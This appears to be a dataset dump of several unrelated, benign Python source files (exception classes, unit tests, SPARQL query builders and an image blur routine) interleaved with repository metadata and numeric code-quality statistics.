0.5
0
0.5
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
5090ecc52653a879e1e20c3598cb5030d2ce3e72
93
py
Python
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
179
2020-07-28T08:21:51.000Z
2022-03-30T21:39:37.000Z
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
255
2017-02-01T11:49:12.000Z
2020-07-26T22:31:25.000Z
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
26
2017-01-17T20:31:13.000Z
2020-06-17T13:09:01.000Z
from vit.formatter.scheduled import Scheduled


class ScheduledFormatted(Scheduled):
    """Formatter for the 'scheduled.formatted' column.

    Intentionally empty: it inherits all formatting behavior from Scheduled
    unchanged and exists only so the formatter-lookup-by-name can resolve it.
    """
    pass
18.6
45
0.817204
10
93
7.6
0.8
0
0
0
0
0
0
0
0
0
0
0
0.129032
93
4
46
23.25
0.938272
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
50b404a20b6b5247319234cb273258d88d096814
214
py
Python
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
12
2021-12-18T10:41:10.000Z
2022-03-29T23:00:29.000Z
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
103
2021-12-07T08:51:15.000Z
2022-03-31T13:28:48.000Z
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
3
2022-01-18T04:45:48.000Z
2022-03-14T09:48:22.000Z
class MissingAttributeException(Exception):
    """Raised when a required attribute is missing."""


class UnknownMarketException(Exception):
    """Raised when the referenced market is not known."""


class UnknownPricesException(Exception):
    """Raised when prices are unavailable or unknown."""


class WrongTypeAttributeException(Exception):
    """Raised when an attribute has a value of the wrong type."""
14.266667
45
0.785047
16
214
10.5
0.4375
0.309524
0.321429
0
0
0
0
0
0
0
0
0
0.158879
214
14
46
15.285714
0.933333
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
1
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
50e07f9cb689cc6c6184e548267a3670d6b5bca6
1,042
py
Python
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
null
null
null
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
5
2021-06-13T19:42:42.000Z
2021-07-12T18:00:54.000Z
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
null
null
null
from ll_zip.linked_list import LinkedList from ll_zip import __version__ from ll_zip.ll_zip import ll_zip def test_version(): assert __version__ == '0.1.0' def test_ll_zip_1(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll1.append(2) ll2.append(5) ll2.append(9) ll2.append(4) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (2) -> (4) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted def test_ll_zip_2(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll2.append(5) ll2.append(9) ll2.append(4) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (4) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted def test_ll_zip(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll1.append(2) ll2.append(5) ll2.append(9) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (2) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted
18.607143
71
0.565259
151
1,042
3.728477
0.165563
0.097691
0.056838
0.063943
0.776199
0.776199
0.776199
0.744227
0.744227
0.671403
0
0.084197
0.259117
1,042
56
72
18.607143
0.645078
0
0
0.717949
0
0.076923
0.146692
0
0
0
0
0
0.102564
1
0.102564
false
0
0.076923
0
0.179487
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0fdef1d6e164092e4f858cfa96e7c7ec0d5dad2a
59
py
Python
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
85
2021-08-04T14:27:56.000Z
2022-03-30T13:35:36.000Z
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
12
2021-08-23T15:57:06.000Z
2022-03-30T03:31:54.000Z
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
9
2021-08-10T03:04:15.000Z
2022-01-09T14:00:05.000Z
from .resnet_cifar import * from .resnet_imagenet import *
19.666667
30
0.79661
8
59
5.625
0.625
0.444444
0
0
0
0
0
0
0
0
0
0
0.135593
59
2
31
29.5
0.882353
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0fe3014bc35ef9c6f5a5dbe5d0aa4e251d15bc15
19
py
Python
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
from .OF import *
9.5
18
0.631579
3
19
4
1
0
0
0
0
0
0
0
0
0
0
0
0.263158
19
1
19
19
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
ba1f8bf45ccceae165160db8a4d23a7598b706ff
162
py
Python
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
null
null
null
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
null
null
null
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
1
2019-09-17T15:26:35.000Z
2019-09-17T15:26:35.000Z
#Making root folder available to notebook import os import sys if os.path.split(os.getcwd())[0] not in sys.path : sys.path.append(os.path.split(os.getcwd())[0])
32.4
97
0.734568
30
162
3.966667
0.566667
0.10084
0.184874
0.218487
0.336134
0.336134
0
0
0
0
0
0.013889
0.111111
162
5
97
32.4
0.8125
0.246914
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e84b30c4073b9c869d9bfef77ad08dffec3ffe4c
44
py
Python
wikisync/__init__.py
ivanchoo/TracWikiSync
529f226b351efe49983191723e4e04ffd0ab325a
[ "MIT" ]
1
2016-10-07T11:33:20.000Z
2016-10-07T11:33:20.000Z
wikisync/__init__.py
InQuant/TracWikiSync
60d95c59176829b2c9a6d29e27364823b08b5e0d
[ "MIT" ]
3
2015-02-23T04:09:41.000Z
2018-07-30T06:00:00.000Z
wikisync/__init__.py
InQuant/TracWikiSync
60d95c59176829b2c9a6d29e27364823b08b5e0d
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from plugin import *
22
23
0.590909
6
44
4.333333
1
0
0
0
0
0
0
0
0
0
0
0.027778
0.181818
44
2
24
22
0.694444
0.477273
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e8a627e75e308cff7591c61f45e8aa49ef79212e
34
py
Python
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
1
2019-02-15T03:42:43.000Z
2019-02-15T03:42:43.000Z
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
1
2021-06-01T22:12:11.000Z
2021-06-01T22:12:11.000Z
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
null
null
null
from src import MainGuiController
17
33
0.882353
4
34
7.5
1
0
0
0
0
0
0
0
0
0
0
0
0.117647
34
1
34
34
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e8c4e9b4bf333b045244e0cf0dcca3363a38fa12
31
py
Python
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
def heyo(): print("heyo")
7.75
17
0.516129
4
31
4
0.75
0
0
0
0
0
0
0
0
0
0
0
0.258065
31
3
18
10.333333
0.695652
0
0
0
0
0
0.133333
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
6
fa06f4c164b47392c3321296e20f69265cebf9b6
109
py
Python
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
from .JsonRpcSolrPassthrough import JsonRpcSolrPassthrough from .JsonRpcHandlerBase import JsonRpcHandlerBase
54.5
58
0.917431
8
109
12.5
0.5
0
0
0
0
0
0
0
0
0
0
0
0.06422
109
2
59
54.5
0.980392
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.5
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
0
0
0
6
fa273803b6a2b2a3b1da4676845d8fddb4bee535
92
py
Python
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
202
2015-01-12T08:10:48.000Z
2021-11-08T09:04:32.000Z
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
30
2015-01-01T09:07:17.000Z
2021-06-03T12:58:45.000Z
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
58
2015-01-12T03:28:54.000Z
2022-01-14T01:58:08.000Z
#coding=utf-8 from uliweb import expose, functions @expose('/') def index(): return {}
13.142857
36
0.663043
12
92
5.083333
0.916667
0
0
0
0
0
0
0
0
0
0
0.013158
0.173913
92
6
37
15.333333
0.789474
0.130435
0
0
0
0
0.012658
0
0
0
0
0
0
1
0.25
true
0
0.25
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
ad1c8cf713b468a732d8e0bb0882116dc5d81f26
44
py
Python
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
from .ionmq import IonMQBroker, IonMQClient
22
43
0.840909
5
44
7.4
1
0
0
0
0
0
0
0
0
0
0
0
0.113636
44
1
44
44
0.948718
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
ad57ec65ddbd78655fcf214f9159b4c5dc4670cf
23
py
Python
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
null
null
null
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
1
2021-10-18T09:59:45.000Z
2021-10-18T09:59:45.000Z
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
4
2021-10-18T09:40:54.000Z
2021-10-19T14:14:28.000Z
import A1 print(A1.a)
5.75
11
0.695652
5
23
3.2
0.8
0
0
0
0
0
0
0
0
0
0
0.105263
0.173913
23
3
12
7.666667
0.736842
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
ad7575b6d31432d7c404c976e0e636141bad5a7c
24
py
Python
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
6
2021-06-13T14:56:30.000Z
2022-02-02T14:41:06.000Z
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
1
2021-04-27T07:42:55.000Z
2021-07-12T08:36:26.000Z
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
null
null
null
from src.utils import *
12
23
0.75
4
24
4.5
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d12c76c3aca8032c7d80901ecd820f23d356ac98
69
py
Python
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
def hello_core(): return "Hello world! This is the core.py file"
23
50
0.695652
12
69
3.916667
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.202899
69
2
51
34.5
0.854545
0
0
0
0
0
0.536232
0
0
0
0
0
0
1
0.5
true
0
0
0.5
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
d1614aa253ffee1dccb9de3a055a0c6f839beba6
3,632
py
Python
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
42
2020-03-25T16:47:30.000Z
2022-01-31T21:26:38.000Z
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
367
2020-04-08T12:46:34.000Z
2022-02-16T01:15:32.000Z
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
3
2020-05-14T08:24:46.000Z
2021-08-04T05:00:16.000Z
import pytest from river.adapters.progression_counter import InMemoryProgressionCounter from river.adapters.topics import InMemoryTopicsManager from river.topicleaner.service import clean pytestmark = pytest.mark.django_db def test_done_batch_is_cleaned(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 10} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics == set() def test_done_batch_is_cleaned_with_failed(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={ f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 6, "failed": 4} for resource in batch.resources.all() } ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics == set() def test_ongoing_batch_is_not_cleaned(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 9} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_ongoing_batch_is_not_cleaned_with_failed(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={ f"{batch.id}:{resource.id}": {"extracted": 10, 
"loaded": 6, "failed": 2} for resource in batch.resources.all() } ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_none_counter_prevents_cleaning(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": None, "loaded": 10} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_missing_counter_prevents_cleaning(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 10} for resource in batch.resources.all()[1:]} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set()
35.262136
119
0.680617
427
3,632
5.601874
0.138173
0.060201
0.050167
0.067726
0.910535
0.910535
0.898411
0.898411
0.898411
0.898411
0
0.017461
0.180066
3,632
102
120
35.607843
0.785762
0
0
0.597403
0
0
0.147026
0.077643
0
0
0
0
0.077922
1
0.077922
false
0
0.051948
0
0.12987
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0f37b5f6dd8091ae9f4b14870ad10b136c902c51
119
py
Python
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
from . import init, start_background_jobs from .api.server import application # NOQA init() start_background_jobs()
17
43
0.789916
16
119
5.625
0.625
0.2
0.422222
0.511111
0
0
0
0
0
0
0
0
0.134454
119
6
44
19.833333
0.873786
0.033613
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
0f4cfbd667d25b80cc0bd40ae44b69396a8703a0
26
py
Python
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
71
2015-10-25T16:50:18.000Z
2022-03-02T03:46:19.000Z
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
336
2015-02-11T22:39:54.000Z
2022-02-22T18:42:32.000Z
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
24
2016-09-11T17:12:10.000Z
2022-02-24T22:57:09.000Z
from .schott import schott
26
26
0.846154
4
26
5.5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.115385
26
1
26
26
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0f618b7c1df9610db9658175c8f6b7b6f63756b9
37
py
Python
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
def __main(): def __main()
3.7
13
0.486486
4
37
3.5
0.5
1
0
0
0
0
0
0
0
0
0
0
0.378378
37
9
14
4.111111
0.608696
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
7e14aa0f55fce058bc632ef94e78c3509bb3079a
4,004
py
Python
rdfframes/test_queries/test_aggregation.py
qcri/RDFframe
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
13
2019-07-06T00:10:11.000Z
2022-02-20T02:14:16.000Z
rdfframes/test_queries/test_aggregation.py
qcri/RDFrame
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
1
2019-05-20T08:51:42.000Z
2019-05-20T08:51:42.000Z
rdfframes/test_queries/test_aggregation.py
qcri/RDFframe
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
3
2020-04-17T10:50:37.000Z
2022-03-23T01:30:16.000Z
from rdfframes.knowledge_graph import KnowledgeGraph def test_simple_query(): # create a knowledge graph to store the graph uri and prefixes graph = KnowledgeGraph('twitter', 'https://twitter.com', prefixes={ "rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "sioc": "http://rdfs.org/sioc/ns#", "sioct": "http://rdfs.org/sioc/types#", "to": "http://twitter.com/ontology/", "dcterms": "http://purl.org/dc/terms/", "xsd": "http://www.example.org/", "foaf": "http://xmlns.com/foaf/0.1/" }) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count(src_col_name='tweet', new_col_name='tweet_count', unique=True) sparql_query = dataset.to_sparql() print("sparql_query that returns each user and his unique tweet count =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count('tweet') sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets per user without unique =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count('tweet', new_col_name='n_tweets').sum('n_tweets') sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets 
as the sum of tweets per user without unique =\n{}\n".format(sparql_query)) dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.count("tweet", unique=True) sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False) ]) dataset = dataset.group_by(['tweep']).count(src_col_name='tweet', new_col_name='tweet_count', unique=True) dataset = dataset.expand(src_col_name='tweep', predicate_list=[('sioc:content', 'text', False)]) sparql_query = dataset.to_sparql() print("sparql_query that returns the tweep, tweet_count, text of each tweet =\n{}\n".format(sparql_query)) # TODO: make sure this actually returns the expected result if __name__ == '__main__': test_simple_query()
49.432099
133
0.600649
472
4,004
4.883475
0.205508
0.04859
0.072885
0.045553
0.760954
0.752712
0.739696
0.739696
0.739696
0.739696
0
0.003744
0.266234
4,004
80
134
50.05
0.780803
0.073427
0
0.625
0
0
0.291115
0
0
0
0
0.0125
0
1
0.015625
false
0
0.015625
0
0.03125
0.078125
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
6
7e59f06a617223cc10fb7198fe2dd71643fc5f54
9,364
py
Python
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
""" File: blur.py ------------------------------- This file shows the original image(smiley-face.png) first, and then its blurred image. The blur algorithm uses the average RGB values of a pixel's nearest neighbors. """ from simpleimage import SimpleImage def blur(img): """ :param img: SimpleImage, original image. :return: SimpleImage, blurred image. """ new_img = SimpleImage.blank(img.width, img.height) for y in range(img.height): for x in range(img.width): if (img.width - 1) > x >= 1 and (img.height - 1) > y >= 1: # for the pixel inside. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_3.red + pixel_4.red + pixel_start.red + pixel_6.red + pixel_7.red + pixel_8.red + 